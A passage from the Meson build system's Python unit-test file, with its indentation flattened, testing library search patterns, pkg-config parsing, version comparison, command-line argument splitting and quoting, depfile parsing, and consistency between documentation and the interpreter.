# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.Tuple[str, Exception]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.BUILTIN_OPTIONS.keys(),
*mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
data_files = [] # type: T.List[T.Tuple(str, str)]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
from pprint import pprint
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
